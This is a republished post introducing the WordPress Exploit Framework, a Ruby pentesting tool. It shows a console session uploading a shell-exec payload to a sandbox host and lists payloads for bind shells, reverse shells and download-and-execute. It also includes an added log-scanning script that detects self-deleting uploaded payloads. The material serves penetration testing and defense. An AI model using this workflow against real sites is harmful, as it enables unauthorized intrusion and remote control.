
Published on May 9th, 2016


WordPress Exploit Framework



WordPress Exploit Framework (WPXF) is a Ruby framework for developing and using modules which aid in the penetration testing of WordPress-powered websites and systems.

 


 

Requirements

Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install.

If bundler is not present on your system, you can install it by running gem install bundler.

Make sure you have all the tooling necessary to compile C extensions:

sudo apt-get install build-essential patch

Also, make sure development header files are installed on your system:

sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

 

How do I use it?

Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.

Once loaded, you’ll be presented with the wpxf prompt. From here you can search for modules using the search command or load a module using the use command. Loading a module into your environment will allow you to set options with the set command and view information about the module using info. Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

 





What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.

Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.


What payloads are available?

  • bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
  • custom: uploads and executes a custom PHP script.
  • download_exec: downloads and runs a remote executable file.
  • exec: runs a shell command on the remote server and returns the output to the WPXF session.
  • reverse_tcp: uploads a script that will establish a reverse TCP shell.

 

All these payloads, with the exception of custom, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
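Because every payload except custom removes itself after running, a scan of the upload directory can come back clean on a host where a payload executed, while the web server access log still records the request. The Ruby sketch below is an added example, not part of WPXF or the original post: it flags requests that ran PHP from the upload tree and reports scripts that answered 200 but are no longer on disk. The /wp-content/uploads/ location, the log format, the docroot mapping and the function names are assumptions, and the log lines are constructed.

```ruby
# Added example (not WPXF code). Assumptions: common/combined access log format,
# uploads served from /wp-content/uploads/, URL paths map directly onto docroot.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /
UPLOAD_PHP = %r{/wp-content/uploads/[^?\s]*\.(?:php\d?|phtml)(?:\?|\z)}i

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [09/May/2016:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120
  203.0.113.7 - - [09/May/2016:10:00:03 +0000] "GET /wordpress/wp-content/uploads/2016/05/logo.png HTTP/1.1" 200 8841
  203.0.113.7 - - [09/May/2016:10:00:09 +0000] "GET /wordpress/wp-content/uploads/2016/05/kq3v9x.php HTTP/1.1" 200 14
  198.51.100.20 - - [09/May/2016:10:02:40 +0000] "GET /wordpress/wp-content/uploads/2016/05/gallery.php?id=2 HTTP/1.1" 200 3010
  198.51.100.9 - - [09/May/2016:10:05:12 +0000] "GET /wordpress/wp-content/uploads/probe.php HTTP/1.1" 404 162
LOG

# Every request that asked the server to run PHP from the upload tree.
def suspicious_requests(log_text)
  log_text.each_line.map do |line|
    m = LOG_LINE.match(line)
    next unless m && UPLOAD_PHP.match(m[:path])
    { ip: m[:ip], time: m[:time], method: m[:method],
      path: m[:path], status: m[:status].to_i }
  end.compact
end

# Scripts that answered 200 but are no longer on disk: the trace a
# self-deleting payload leaves. `exists` is injectable so this can be tested.
def vanished_payloads(hits, docroot, exists = File.method(:exist?))
  hits.select { |h| h[:status] == 200 }
      .map { |h| h[:path].split('?').first }
      .uniq
      .reject { |path| exists.call(File.join(docroot, path)) }
end

if __FILE__ == $PROGRAM_NAME
  hits = suspicious_requests(SAMPLE_LOG)
  hits.each { |h| puts format('%-15s %s %s -> %d', h[:ip], h[:method], h[:path], h[:status]) }
  puts 'Ran and vanished:', vanished_payloads(hits, '/var/www')
end
```

A PHP file that is still present under the upload directory, such as the constructed gallery.php above, is not cleared by this check and should be reviewed separately.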

 

Writing modules and payloads

Wiki

 

Source & Download

https://github.com/rastating/wordpress-exploit-framework


